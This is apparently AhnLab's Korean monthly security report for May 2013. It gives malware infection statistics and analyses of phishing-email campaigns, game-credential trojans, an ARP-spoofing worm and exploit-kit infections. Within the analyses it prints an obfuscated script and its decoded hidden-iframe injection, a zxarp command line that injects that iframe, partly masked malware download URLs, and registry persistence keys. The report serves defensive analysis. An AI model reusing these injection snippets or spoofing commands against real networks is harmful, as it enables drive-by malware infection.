ASEC REPORT VOL.41 2013.06 안랩월간보안보고서 2013 년 5 월보안동향
CONTENTS ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 ASEC에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다. 자세한내용은안랩닷컴 (www.ahnlab.com) 에서확인하실수있습니다. 2013 년 5 월보안동향 악성코드동향 01. 악성코드통계 03-5월악성코드, 전월대비 33만여건감소 - 악성코드대표진단명감염보고최다 20-5월최다신종악성코드온라인게임핵 - 5월악성코드유형트로이목마가최다 - 악성코드유형별감염보고전월비교 - 신종악성코드유형별분포 02. 악성코드이슈 07 - 사서함용량이초과되었습니다! - 탈취한인증서를악용한온라인게임핵 - 롤백 ( 시스템복원 ) 기능을가진악성코드 - 금융사계정정보로위장한스팸메일 - 금융권명의도용피싱팝업주의 - ARP Spoofing 유발악성코드 - PUP를통한온라인게임핵유포 - IE 8 취약점을악용한사례주의 - 과속범칙금메일로위장한악성코드유포 - Bank of America로위장한스팸메일 - 미국우편공사 (USPS) 로위장한스팸메일 - UPS 화물운송장으로위장한스팸메일 - UPS 택배가도착했습니다 03. 모바일악성코드이슈 19 보안동향 01. 보안통계 21-5월마이크로소프트보안업데이트현황 02. 보안이슈 22 - 미정부기관홈페이지를이용한 watering hole 공격보고 - MS Windows XP 지원종료 - 심화되는국가간 APT 공격 - 심각한리눅스커널취약점패치웹보안동향 01. 웹보안통계 24 - 웹사이트악성코드동향 - 월별악성코드배포 URL 차단건수 - 월별악성코드유형 - 월별악성코드가발견된도메인 - 월별악성코드가발견된 URL - 악성코드유형별배포수 - 악성코드배포순위 02. 웹보안이슈 27 - 사이트배너광고, 과연안전한가? - 소셜댓글서비스를통한악성코드유포 - 모바일청첩장으로위장한악성앱발견
3 01 악성코드동향 악성코드통계 5월악성코드, 전월대비 33만여건감소 15,000,000 ASEC이집계한바에따르면, 2013 년 5월에감염이보고된악성코드는 517만 993건인것으로나타났다. 이는전월 550만 8895건에비 10,000,000 5,000,000 7,685,579 14.6% -2,176,684 5,170,993 5,508,895 28.3% 6.1% -337,902 해 33만 7902건이감소한수치다 ([ 그림 1-1]). 이중에서가장많이보고된악성코드는 Win-Trojan/Wgames. Gen이었으며, ASD.PREVENTION과 Win-Trojan/Asd.variant가다음으로많았다. 또한총 4건의악성코드가최다 20건목록에새로이름을올렸다 ([ 표 1-1]). 0 03 04 05 그림 1-1 월별악성코드감염보고건수변화추이 순위 등락 악성코드명 건수 비율 1 10 Win-Trojan/Wgames.Gen 232,796 13.2 % 2 ASD.PREVENTION 180,949 10.2 % 3 10 Win-Trojan/Asd.variant 176,972 9.9 % 4 1 Textimage/Autorun 141,072 8.0 % 5 1 Malware/Win32.generic 100,447 5.7 % 6 1 Trojan/Win32.onlinegamehack 95,773 5.4 % 7 6 Win-Trojan/Onlinegamehack140.Gen 90,969 5.2 % 8 4 Trojan/Win32.urelas 80,866 4.6 % 9 9 Trojan/Win32.agent 76,997 4.4 % 10 NEW Win-Trojan/Downloader.205360 76,360 4.3 % 11 5 Als/Bursted 73,280 4.2 % 12 RIPPER 68,393 3.9 % 13 NEW Win-Trojan/Onlinegamehack141.Gen 56,939 3.2 % 14 NEW BinImage/Host 55,787 3.2 % 15 5 Malware/Win32.suspicious 50,249 2.8 % 16 1 Win-Trojan/Avkiller4.Gen 45,845 2.6 % 17 2 Win32/Autorun.worm.307200.F 44,049 2.5 % 18 9 Trojan/Win32.Gen 42,624 2.4 % 19 NEW JS/Exploit 39,312 2.2 % 20 Win32/Virut.f 36,199 2.1 % TOTAL 1,765,878 100.0 % 표 1-1 2013년 5월악성코드최다 20건 ( 감염보고, 악성코드명기준 )
4 악성코드대표진단명감염보고최다 20 [ 표 1-2] 는악성코드별변종을종합한악성코드대표진단명중가장많이보고된 20건을추린것이다. 이중 Trojan/Win32가총 67 만 5274건으로가장빈번히보고된것으로조사됐으며 Win-Trojan/ Agent이 36만 5391건, Win-Trojan/ Onlinegamehack이 27만 289건으로그뒤를이었다. 순위 등락 악성코드명 건수 비율 1 Trojan/Win32 675,274 20.4 % 2 1 Win-Trojan/Agent 365,391 11.0 % 3 1 Win-Trojan/Onlinegamehack 270,289 8.2 % 4 10 Win-Trojan/Wgames 232,796 7.0 % 5 4 Win-Trojan/Downloader 206,085 6.2 % 6 ASD 180,949 5.5 % 7 13 Win-Trojan/Asd 176,972 5.3 % 8 3 Adware/Win32 163,360 4.9 % 9 2 Malware/Win32 159,316 4.8 % 10 2 Textimage/Autorun 141,114 4.3 % 11 7 Win-Trojan/Onlinegamehack140 90,969 2.8 % 12 1 Win32/Virut 90,531 2.7 % 13 3 Win32/Conficker 88,324 2.7 % 14 2 Win32/Autorun.worm 83,672 2.5 % 15 NEW Als/Bursted 73,280 2.2 % 16 1 RIPPER 68,393 2.1 % 17 2 Downloader/Win32 67,337 2.0 % 18 2 Win32/Kido 66,425 2.0 % 19 NEW Win-Trojan/Onlinegamehack141 56,939 1.7 % 20 NEW BinImage/Host 55,787 1.7 % TOTAL 3,313,203 100.0 % 표 1-2 악성코드대표진단명최다 20건 5월최다신종악성코드트로이목마 [ 표 1-3] 은 5월에신규로접수된악성코드중감염보고가가장많았던 20건을꼽은것이다. 5월의신종악성코드는트로이목마 (Win-Trojan/ Downloader.205360) 가 7만 6360 건으로전체의 39% 를차지했다. 드롭퍼 (Dropper/Agent.155248) 는 1만 9882건이보고돼그뒤를이었다. 순위 악성코드명 건수 비율 1 Win-Trojan/Downloader.205360 76,360 39.0 % 2 Dropper/Agent.155248 19,882 10.1 % 3 Win-Trojan/Agent.25088.YR 15,916 8.1 % 4 Win-Trojan/Agent.1112120 15,633 8.0 % 5 Win-Trojan/Agent.724024 9,618 5.0 % 6 Win-Trojan/Agent.877624 9,250 4.7 % 7 Win-Trojan/Korgamehack.1556480 5,313 2.7 % 8 Win-Adware/Shortcut.124464 4,967 2.5 % 9 Win-Trojan/Kanav.205344 4,583 2.4 % 10 Win-Trojan/Korad.98304 4,508 2.3 % 11 Win-Trojan/Downloader.150040 3,795 2.0 % 12 Win-Trojan/Banker.720944 3,773 1.9 % 13 Win-Trojan/Downloader.1066207 3,368 1.7 % 14 Win-Trojan/Downloader.294138 3,204 1.6 % 15 Win-Trojan/Keygen.31247 3,015 1.5 % 16 Win-Trojan/Agent.183408 2,826 1.4 % 17 Win-Adware/KorAd.98304.E 2,599 1.3 % 18 Win-Trojan/Agent.54784.MF 2,519 1.3 % 19 Win-Adware/KorAd.98304.D 2,508 1.3 % 20 Win-Trojan/Urelas.1572864 2,310 1.2 % TOTAL 195,947 100.0 % 표 1-3 5월신종악성코드최다 20건
5 5월악성코드유형트로이목마가최다 [ 그림 1-2] 는 2013년 5월 1개월간안랩고객으로부터감염이보고된악성코드의유형별비율을집계한결과다. 트로이목마 (Trojan) 가 57.8% 로가장높은비율을나타냈고웜 (Worm) 이 6.8%, 애드웨어 (Adware) 가 5.1% 의비율을각각차지했다. 그림 1-2 악성코드유형별비율 악성코드유형별감염보고전월비교 [ 그림 1-3] 은악성코드유형별감염비율을전월과비교한것이다. 트로이목마, 웜, 스크립트, 바이러스, 애프케어는등은전월에비해증가세를보였으며, 애드웨어, 드롭퍼, 익스플로이트, 스파이웨어는감소했다. 다운로더계열은전월수준을유지했다. 그림 1-3 2013 년 4 월 vs. 2013 년 5 월악성코드유형별비율
6 신종악성코드유형별분포 5월의신종악성코드를유형별로살펴보면트로이목마가 83% 로가장많았고드롭퍼가 9%, 애드웨어는 7% 로각각집계됐다. 그림 1-4 신종악성코드유형별분포
7 02 악성코드동향 악성코드이슈 사서함용량이초과되었습니다! 정상적인메일로위장해악성코드를유포하는사례가지속적으로발생하고있다. 최근국내에서메일사서함용량이초과됐다는내용으로수신된메일이의심스럽다는문의가접수됐다. 메일용량을늘리기전까지는메일을수발신할수없다는내용으로, 링크를클릭해파일을다운받고실행하도록유도하고있다. 해당악성코드는감염시사용자의시스템에서다양한정보 ( 실행된프로그램정보, 접속한웹정보, 키로깅정보, 스크린샷 ) 를수집하며, 악성코드제작자가생성한것으로보이는특정메일로수집한정보를전송한다. 그림 1-9 특정메일서버를통한메일발송패킷 아래는분석당시전송된메일내용이며, 수집된정보가 HTML 형태의파일로첨부된것을확인할수있다. 그림 1-5 수신된메일원문 링크를통해다운로드받은파일은인터넷익스플로러 (Internet Explorer) 아이콘으로위장하고있으며, 해당파일실행시악성코드에감염된다. 그림 1-6 링크를통해다운로드받은파일 그림 1-10 수집된정보가첨부되어발송된메일원문 파일이실행되면아래와같은파일이생성된다. 첨부된내용은아래와같이확인할수있다. 그림 1-7 생성되는파일 또한, 시스템재시작시에도동작할수있도록아래와같이레지스트리값을등록한다. 그림 1-11 실행중인프로그램정보 그림 1-8 생성되는레지스트리값 그림 1-12 웹접속정보
8 makepcookie.js파일에 Hex 문자열로난독화된형태의악성스크립트링크가존재했다. http://on****.co.kr/js/makepcookie.js 그림 1-13 키로깅정보 난독화된악성스크립트링크 : window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\ x72\x69\x74\x65"]("\x3c\x69\x66\x72\x61\x6d\x65 \x77\x69\x64\x74\x68\x3d\x27\x31\x30\x30\ x27x68\x65\x69\x67\x68\x74\x3d\x27\x30 \x27\x73\x72\x63\x3d\x27\x68\x74\x74\x70\x3a\ x2f\x2f\x73\x6e\x73\x6f\x66\x74\x2e\x64 \x69//---중간생략---//\x2e\x68\x74\x6d\x6c\x27\ x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e"); 난독화해제후코드 : <iframe width='100' height='0' src='http://snsoft.******bill. co.kr/about/css.html'></iframe> 그림 1-14 화면캡처정보이처럼악성코드에의해수집된정보는지능형지속보안위협 (APT, Advanced Persistent Threat) 을목적으로수집및이용될수있으며, 이는사용자가속한조직에큰보안위협을야기할수있으므로각별한주의가필요하다. 해당악성코드는 V3 제품에서아래와같이진단이가능하다. Backdoor/Win32.Gbot (2013.05.28.02) 난독화된코드가 IE에의해해석되면서또다른특정사이트로부터악성스크립트인 css.html을다운로드한후실행하도록되어있다. css. html은국내해킹된웹사이트에서흔히볼수있는익스플로이트툴킷 (Exploit Toolkit) 인 Dadong으로난독화돼있다. 기존의형태와마찬가지로악성코드를 PC에감염시키기위해다중취약점 (JAVA, IE, Flash Player 등 ) 을사용했으며, 조건이부합하는취약점을통해실제악성코드를다운로드및실행하도록해뒀다. 아래코드는난독화된 css.htm의난독화해제후상태를도식화한것으로가능한많은 PC를감염시키기위해서자바 (Java) 취약점 6개, 플래시플레이어 (Flash Player) 1개, IE 1개등총 8개의취약점을사용했다. 탈취한인증서를악용한온라인게임핵최근국내의해킹된웹사이트를통해유포된악성코드가, PC를감염시키는과정에서생성한파일중특정파일공유사이트의인증서로서명된사례가발견됐다. Java Flash Player IE CVE-2011-3544 CVE-2012-0507 CVE-2012-1723 CVE-2012-4681 CVE-2012-5076 CVE-2012-5076 CVE-2013-0634 CVE-2012-1889 표 1-4 css.html 이사용한취약점 ID 만약 PC에 [ 표 1-4] 중하나의취약점이라도존재한다면, 해당취약점으로인해특정사이트로부터파일이다운로드돼실행된다. - 파일다운로드 URL: http://snsoft.*****bill.co.kr/about/up.exe 그림 1-15 국내 P2P 사이트의인증서로서명된악성코드 위 [ 그림 1-15] 가취약점 (JAVA, IE, Flash Player) 이존재하는 PC에다운로드되어실행되기까지의과정을정리해보면아래와같다. 최초악성스크립트링크가삽입된페이지는 P2P 웹사이트였으며, 그림 1-16 up.exe 의실행구조
9 up.exe에의해생성된 %SYSTEM%\[ 서비스이름 ]+32.dll 의파일명은감염된 PC에서윈도우정상파일인svchost.exe를통해서실행되는서비스명과조합되며, 해당파일을이용하는서비스목록은아래레지스트리키에서확인할수있다. 이외에도 black.dll 의복사본이악성 lpk.dll 이름으로모든폴더에생성되며, [ 그림 1-20] 과같이특정 IP주소로의네트워크연결이확인된다. 그림 1-20 네트워크연결정보 그림 1-17 svchost.exe 를통해서실행되는서비스리스트 또한 up.exe는감염된 PC의맥주소와운영체제버전정보등을암호화한후특정 IP로전송하는기능도있다. 해당악성코드의치료를위해서는전용백신으로의검사와치료가필요하다. 안랩은해당악성코드의전용백신을제작해무료로배포중이다. 해당악성코드의전용백신은다른전용백신들과사용법이다소달라사용매뉴얼 PDF파일을같이안내하고있다. http://provide.ahnlab.com/v3sos/lapka Rootkit 전용백신사용법.pdf 그림 1-18 암호화되지않은시스템정보 그림 1-19 암호화된시스템정보 Trojan/Win32.Agent (2013.05.07.00) 그림 1-21 전용백신실행화면안랩은변종악성코드가지속적으로접수되고있는만큼, 계속하여전용백신을업데이트해대응중에있다. V3 제품에서는아래와같이진단이가능하다. 롤백 ( 시스템복원 ) 기능을가진악성코드악성코드를치료해도시스템을재부팅하고나면다시악성코드가복원된다?! 최근시스템복원기능을가진일명 롤백 (Rollback) 증상이있는악성코드가발견됐다. 해당악성코드는지속적인시스템감염상태를유지하기위해시스템복원기술을악용하고있어치료에어려움이있었다. 이악성코드가최종적으로감염시키는것은온라인게임핵이다. 롤백기능이있는해당악성코드에감염되면아래와같은파일이생성된다. [ 생성되는파일 ] Backdoor/Win32.Lapka (2013.04.15.04) Trojan/Win32.Redflt (2013.04.22.01) Win-Trojan/Agent.15360.ZG (2013.04.12.03) 금융사계정정보로위장한스팸메일금융사계정정보로위장해악성코드를유포하는스팸메일이확산돼사용자들의주의가요구된다. 이스팸메일은아래와같이 chase사의사용자계정정보와관련된내용이지만 Zbot 악성코드가압축파일의형태로첨부돼있었다. C:\WINDOWS\system32\wininit[ 영문자 ].exe (Dropper) C:\WINDOWS\system32\Black.dll C:\WINDOWS\system32\RCX[ 영숫자 ].tmp C:\WINDOWS\system32\Drivers\diskflt.sys C:\WINDOWS\system32\drivers\passthru.sys 그림 1-22 금융사정보로위장한스팸메일
10 압축해제된파일을실행하면 C:\Documents and Settings\ ahnmaru78\application Data 폴더에랜덤한폴더를생성한뒤자신을복사한후실행해악성코드에감염시킨다. 또한, 복사한파일이부팅시실행되도록레지스트리에자신을등록한다. HKCU\Software\Microsoft\Windows\CurrentVersion\ R u n \ { E 5 5 5 5 5 F 5-9 C 4 3 - A D 7 D - D E 5 D - 2 6 A 4 F B A A 0 5 B 6 } 그리고아래와같이특정포트를방화벽에서허용하여안전하게통신을할수있도록설정한다. HKLM\SYSTEM\ControlSet001\Services\SharedAccess\ Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\ List\14202:UDP "14202:UDP:*:Enabled:UDP 14202" HKLM\SYSTEM\ControlSet001\Services\SharedAccess\ Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\ List\17000:TCP "17000:TCP:*:Enabled:TCP 17000" 대부분신속하게진단기능을업데이트하기때문이다. 그러나악성코드제작자들도새로운변형악성코드를제작할때보안제품에서쉽게탐지되지않도록만들기때문에악성코드의유포초기에는보안제품을사용중이라해도탐지되지않는경우가더러있다. 따라서출처가불분명한메일은열어보지않아야하고특히이메일에첨부된파일은꼭필요한경우가아니면실행하지않는게좋다. Trojan/Win32.Zbot (2013.05.08.04) Trojan/Win32.Tepfer (2013.05.09.00) 금융권명의도용피싱팝업주의최근금융권을도용한피싱팝업창이등장했다. 해당악성코드에감염된상태에서특정사이트에접속하면 [ 그림 1-25] 와같은팝업창이나타나는사이트로연결된다. 연결된사이트는악의적으로제작된피싱사이트다. 감염이완료된후악성코드는다수의 C&C서버로보이는 IP들에게데이터를전송하고받아오는등통신과정을반복하고아래웹사이트에서추가로악성파일을다운로드해감염시킨다. * http:// a*********.co.za/pon(2).exe 그림 1-23 악성파일다운로드추가감염된악성코드는 PC에저장된다양한사용자정보수집을목적으로제작됐고감염된 PC의 FTP, 메일등의계정및패스워드가저장돼있는다양한프로그램들을확인해관련정보를수집한다. 악성코드의특성상사용자의민감한정보가유출되는등추가피해가발생할수있어주의가필요하다. 그림 1-25 금융권사이트를가장한피싱사이트 사용자가해당페이지의확인버튼을클릭해사용자정보를입력할경우, 입력된정보는공격자에게전송된다. 그림 1-26 악의적인사용자정보입력사이트 해당악성코드는기존파밍 (Pharming) 과유사한형태로, 특정사이트를접속할경우변조된호스트파일에의해피싱사이트로연결되는수법을이용했다. 그림 1-24 악성코드가수집하는프로그램관련정보메일로인한악성코드감염피해를예방하기위한방안으로백신프로그램을사용하는것은사용자에게많은도움이된다. 이메일악성코드의경우변형이발생한것을여러보안회사들이쉽게인지할수있고 특징적인것은공격자가마련해놓은특정사이트에서악성호스트파일을내려받는형태를보인다는점이다. 그림 1-27 특정서버로부터악성호스트파일다운로드
11 아래는악성코드에의해변조된호스트파일이며, [ 그림 1-28] 의사이트에접속할경우악의적인피싱사이트로연결된다. 하더라도사용자의관심이있다면얼마든지피해를막을수있다. 피해를최소화하기위해서는무리하게개인정보를요구하거나, 보안카드번호전체를요구할경우파밍에의한피싱사이트를의심하고, 개인정보를입력하지않아야한다. 특정웹사이트방문시설치되는 ActiveX와 P2P 프로그램을설치할경우에는더욱세심한주의를기울여야한다. V3 제품에서는아래와같이진단이가능하다. Trojan/Win32.Qhost (2013.05.30.00) ARP Spoofing 유발악성코드 그림 1-28 변조된호스트파일 추가적으로악성코드에의해생성된배치파일명령을통해특정프로세스를종료하거나파일의속성을변경하는등의악의적인행위를한다. 최근인터넷사용시어떤사이트에접속을해도 ActiveX 보안경고가나타난다는피해가보고됐다. 이는 ARP Spoofing을유발하는악성코드에감염된시스템으로동일네트워크상의정상 PC에서인터넷사용시악성코드유포 URL이 iframe으로삽입돼발생한증상으로확인됐다. 아래 [ 그림 1-31] 은테스트환경에서해당악성코드의동작을재연한것이다. ARP Spoofing 감염시스템이있는동일네트워크상의정상 PC에서악성코드유포사이트가아닌정상사이트를접속할경우 ActiveX 보안경고가나타난화면이다. 이때신뢰할수있는사이트라고해서무의식적으로 ActiveX 컨트롤러를설치하면이악성코드에감염될수있으니주의가필요하다. 그림 1-29 악의적인행위를위해생성된배치파일 또한악성코드는시스템리소스를다수점유해, 시스템및인터넷속도가느려지는현상이발생한다. 그림 1-31 iframe 삽입에의해실제웹사이트와는무관한 ActiveX 보안경고가나타나는현상 그림 1-30 감염된시스템의리소스점유이와같이불특정사용자를대상으로제작된피싱사이트의경우정상적인사이트와매우흡사하게제작돼, 일반사용자들로하여금의심없이정보를입력하도록유도한다. 하지만아무리정교하게제작됐다 ARP Spoofing을유발하는 PC의악성코드를치료하지않은상태에서는동일네트워크상의다른정상 PC에서인터넷을사용할때마다 ActiveX 보안경고가나타난다. 네트워크로확산되는이런악성코드가다수의 PC에감염된상태에서는네트워크장애가발생할수있다. 내부네트워크에서이같은증상이발생한다면 ARP Spoofing을유발하는악성코드에감염된 PC를찾아조치를취해야한다. ARP Spoofing을유발하는악성코드에감염된 PC를찾는방법은아래 ASEC 블로그내용을참조하면된다.
12 패킷을훔치는 ARP Spoofing 공격탐지툴 (1) 패킷을훔치는 ARP Spoofing 공격탐지툴 (2) ARP Spoofing 탐지툴이외에도 ActiveX 보안경고가발생한시스템에서 arp -a 명령을이용해 ARP Spoofing을유발하는 IP를찾을수있다. 아래 [ 그림 1-32] 에서실제게이트웨이 IP는 192.168.95.2이다. 그런데게이트웨이 IP에해당되는 MAC 주소가 192.168.95.129와동일한것을확인할수있는데, 게이트웨이 MAC 주소와동일한 MAC 주소를가진 192.168.95.129 IP가 ARP Spoofing을유발하는 IP라는것을알수있다. %Temp%\fbA6b6A266.exe %Systemroot%\System32\System32.exe %UserProfile%\Local Settings\Temporary Internet Files\arpx[1]. exe %Temp%\1TbTDtPeT4.exe %Systemroot%\npptools.dll %Systemroot%\wpcap.dll %Systemroot%\WanPacket.dll %Systemroot%\Packet.dll %Systemroot%\system32\drivers\7.tmp %Temp%\8.tmp [ 레지스트리등록 ] HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run @="%Systemroot%\system32\System32.exe" HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services\System32 System "ImagePath"="%Systemroot%\system32\System32.exe" 그림 1-32 arp -a 명령을이용한탐지방법 삽입된 iframe 코드는다음과같으며, win7.html 소스를확인해보면다음 [ 그림 1-33] 과같이인코딩된것을알수있다. <iframe src="http://nave**.**-**s.com/win7.html" width=0 height=0 frameborder=0></iframe> 그림 1-35 win8.exe 파일구성도 그림 1-33 인코딩된 win7.html 소스디코딩하면악성코드를다운받아설치하는정상 ActiveX 컨트롤러정보와악성코드유포 URL을확인할수있다. 그림 1-34 ActiveX 컨트롤러정보와악성코드유포 URL ActiveX 컨트롤러를설치할경우 win8.exe 파일을다운로드받아실행하고, win8.exe 파일은아래와같은파일생성과시스템시작시자동으로실행되도록레지스트리에등록한다. [ 파일생성 ] %Temp%\127.exe %UserProfile%\Local Settings\Temporary Internet Files\win7[1].exe win8.exe 파일에의해생성된 127.exe 파일은아래경로와같이 win7.exe 파일과 arpx.exe 파일을다운로드받아실행하고, 감염된 PC 의 MAC 주소를특정서버로전송한다. hxxp://nave**.**-**s.com/win7.exe hxxp://nave**.**-**s.com/arpx.exe hxxp://nave**.**-**s.com/winx/count.asp?mac=00-0c-29-34-bb- 73&ver=arp1 win7.exe 파일은 fba6b6a266.exe 및 system32.exe 파일과동일한파일이며, system32.exe 파일을윈도우시스템폴더에복사하고시작프로그램과서비스에등록한다. system32.exe 파일은 C&C 서버로추정되는아래 IP로매 4초마다접속을시도하지만분석당시정상연결은되지않았다.
13 C&C 서버 IP : nave**.**-**s.com:1963 (21*.*15.*6.*5:1963) arpx.exe 파일은 1TbTDtPeT4.exe와동일한파일로, ARP Spoofing을위해정상 Winpcap 모듈과 zxarp로알려진중국어로제작된 8.tmp 파일을설치하고실행한다. 8.tmp 파일은 ARP Spoofing을유발하고동일한네트워크상의정상 PC에서인터넷사용시악성코드유포 URL을 iframe 코드로삽입하는동작을한다. 그림 1-37 아이콘화면사용자가메일에첨부된링크를클릭하면보스턴마라톤테러동영상을보여주는웹페이지로연결된다. 실제유포되는파일의아이콘은위의 [ 그림 1-37] 과같으며, 파일실행시아래와같은파일이생성된다. [ 파일생성정보 ] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\datd02.exe C:\WINDOWS\system32\WindowsDriver.dll C:\WINDOWS\system32\xxx.exe 실행된악성코드는악의적인행위를하는또다른파일들을네트워크를통해다운로드하며해당정보는아래와같다. 그림 1-36 8.tmp 명령옵션 8.tmp 파일이아래와같은옵션으로실행되면서 ARP Spoofing과 iframe 코드를삽입한다. - idx 0 -ip 192.168.95.2-192.168.95.254 -port 80 -insert "<iframe src="http://nave**.**-**s.com/win7.html" width=0 height=0 frameborder=0></iframe>" V3 제품에서는아래와같이진단이가능하다. Trojan/Win32.Warp (2013.05.14.00) Win-Trojan/Downloader.15680.B (2013.05.14.00) Win-Trojan/Agent.62276 (2013.05.14.00) Trojan/Win32.Warp (2013.05.14.00) Win-Trojan/Hacktool.53248.E (2013.05.14.00) [ 네트워크정보 ] Sample.exe TCP CONNECT 127.0.0.1=>1xx.1xx.50.2xx:80 Sample.exe HTTP CONNECT 127.0.0.1=>1xx.1xx.50.2xx:80 yo****21.ca**24.com/data.dat Sample.exe TCP DISCONNECT 127.0.0.1=>1xx.1xx.50.2xx:80 svchost.exe TCP CONNECT 127.0.0.1=>1xx.1xx.100.2xx:6174 svchost.exe TCP CONNECT 127.0.0.1=>1xx.1xx.50.1xx:80 svchost.exe HTTP CONNECT 127.0.0.1=>1xx.1xx.50.1xx:80 k****y.ca**24.com/xxx.exe xxx.exe TCP CONNECT 127.0.0.1=>1xx.9.150.2xx:80 xxx.exe HTTP CONNECT 127.0.0.1=>1xx.9.150.2xx:80 1xx.9.150.2xx/update.xml 다른악성코드들과마찬가지로윈도우가시작될때, 자신의프로그램이실행되게하며온라인게임핵악성코드의주기능인에이브이킬 (AVKill) 기능또한감염테스트시확인된다. [ 레지스트리정보 ] PUP 를통한온라인게임핵유포 지속적으로발견되는온라인게임핵악성코드의경우, 꾸준히유포되는만큼다양한유포경로가존재한다. 예컨대사람들이주로사용하는프로그램으로위장하거나, 취약한웹사이트를통한감염, P2P와같은파일공유사이트 ( 프로그램 ) 를통한감염등이있다. 이번에다루는온라인게임핵관련악성코드도기존에발견됐던안카메라업데이트파일또는백신설치파일로위장해유포되는방식과유사하게 PUP 프로그램을통해감염됐다. 온라인게임핵악성코드와함께아래의프로그램도설치가된다. 그림 1-38 악성코드실행시, 설치되는프로그램
14 감염시에는기존온라인게임핵류의악성코드와같은기능을한다. 위와같은피해사례를사전에예방하기위해서는정상적인프로그램이나툴들은해당프로그램제작사홈페이지나공식적인다운로드사이트를통해내려받는게좋다. 또한가급적불필요한프로그램 ( 툴바, 가짜백신, P2P 등 ) 들은설치하지않고삭제하는것을권한다. 다만부득이하게검증되지않은프로그램을사용할필요가있을경우에는공신력있는백신프로그램을이용해사전에검사를진행한후사용하는것이안전하다. 만일해당악성코드에감염됐을경우에는아래 URL에서전용백신을다운로드해에이브이킬악성코드를치료한후, V3로정밀검사를하면된다. 된다. MS13-038(IE의취약점으로인한원격코드실행문제점 ) 을악용하고있어최신윈도우업데이트를하지않은사용자의 IE 브라우저는 drive by download 형태로악성코드에감염된다. 그림 1-41 디코딩후코드 [ 전용백신다운로드 URL] http://www.ahnlab.com/kr/site/download/vacc/vaccview.do?seq=105 그림 1-39 전용백신치료화면 V3 제품에서는아래와같이진단이가능하다. Win-Trojan/Dwonloader.157322 (2013.05.18.06) Win-PUP/Downloader.KorAd.65536 (2013.05.18.00) IE 8 취약점을악용한사례주의최근안보를연구하는관련웹사이트에서악성코드가유포되고있어주의가당부된다. 아래는수집된악성스크립트중하나다. 해당악성코드는분석을어렵게하기위해스크립트가난독화돼있다. 그림 1-42 MS13-038(IE8 취약점 ) 생성되는파일 Internet Explorer 8 버전은메모리충돌로인해원격코드실행이가능한제로데이취약점이존재한다. Microsoft는공개적으로보고된 Internet Explorer 8의취약점을조사하고있으며, Internet Explorer 6, Internet Explorer 7, Internet Explorer 9 및 Internet Explorer 10은해당취약점의영향을받지않는다. 해당악성스크립트는대만에위치한시스템에업로드돼있음이확인됐다. 그림 1-40 아이콘화면 난독화된스크립트를디코딩하면아래와같은악성스크립트가확인 그림 1-43 악성스크립트업로드위치
15 국내대부분의사용자가 IE를사용하고있는데다가해당악성코드가최근발견된취약점을악용하고있어감염사례가적잖게나타날것으로보인다. 더군다나안보연구와관련한사이트들에서발견되고있다는점에서민감하게다뤄질소지도있다. 감염을예방하기위해서는윈도우는물론, 설치한백신을항상최신버전으로업데이트할것을권한다. V3 제품에서는아래와같이진단이가능하다. JS/Shellcode (2013.05.23.00) 과속범칙금메일로위장한악성코드유포최근과속범칙금통보메일로위장해유포되는악성코드가발견됐다. 국내에거주하는사용자들에게는위험성이다소낮으나최근해외금융사등의메일로배포되는악성코드와유사해사용자들의주의가요구된다. 해당메일의원문은 [ 그림 1-44] 와같다. [ 레지스트리등록 ] HKCU\Software\Microsoft\Windows\CurrentVersion\ Run\{07B002BD-02AB-AD7F-31B7-BBCB31C598D9} HKLM\SYSTEM\ControlSet001\Services\SharedAccess\ Parameters\FirewallPolicy\StandardProfile\DisableNotifications HKLM\SYSTEM\ControlSet001\Services\SharedAccess\ Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\ List\27641:UDP 1) 악성코드파일을시작프로그램에등록 2) explorer.exe 프로세스에대해방화벽예외설정정책설정 3) UDP를사용하는 27641 포트개방 4) TCP를사용하는 24266 포트개방추가로 Address Book 폴더에있는 Administrator.wab 파일은윈도우 OS 의사용자주소록과관련된파일로악성코드실행시, Administrator.wab 파일에접근하는로그도확인된다. 이는해당악성코드가봇기능외에도사용자들의연락처정보를이용하는것을알수있다. [ 악성코드가접근하는파일경로 ] C:\Documents and Settings\Administrator\Application Data\ Microsoft\Address Book\Administrator.wab 그림 1-44 과속범칙금통보메일로위장한메일의본문 위의내용을살펴보면메일에첨부된파일을실행하도록유도하는내용을확인할수있으며, 메일에첨부된파일은 [ 그림 1-45] 와같다. 그림 1-45 첨부된악성코드해당파일을실행하면아래와같이자신을복제해방화벽을우회한다음, 자동으로실행될수있도록레지스트리에특정값을등록한다. 특히자신을복제할때 5자리임의의폴더및파일의이름으로복제하며, 악성코드감염시생성되는배치파일은자신의파일을스스로삭제해흔적을감추는기능을한다. [ 파일생성 ] C:\Documents and Settings\Administrator\Application Data\ Tejif\saado.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpab59ca6c.bat 그림 1-46 Administrator.wab 파일또한아래그림과같이네트워크연결정보도확인된다. 그림 1-47 악성코드감염시네트워크연결정보위의악성코드의경우지속적으로발견되고있는메일위장악성코드
16 와같은류의악성코드로발신인이명확하지않은이메일, 의심스러운링크가포함된이메일, 특정파일을실행하도록유도하는이메일등을주의하면감염을막을수있다. 해당파일의버전정보를확인해보면, 아래와같이어떠한내용도확인할수없다. 이역시첨부된실행파일이악성코드일것이라는의심을가능하게한다. 해당악성코드는 V3 제품을통해진단및치료가가능하다. Trojan/Win32.Zbot (2013.05.09.00) Bank of America 로위장한스팸메일 최근 Bank of America에서보낸것으로위장해악성코드를배포하는스팸메일이발견돼사용자들의주의가요구된다. 이번에발견된스팸메일은 You transaction is completed ( 당신의계좌이체가성공했습니다 ) 라는제목이었으며, 본문내용은다음과같다. 그림 1-50 버전정보를확인할수없는첨부파일해당파일을실행하면아래와같은파일이생성돼방화벽을우회하며자동으로실행될수있도록레지스트리에특정값을등록한다. 또, 악성코드에감염되면최초실행된첨부파일을스스로삭제해흔적을감춘다. [ 파일생성 ] C:\Documents and Settings\Administrator\Application Data\ Uptyec\ityv.exe 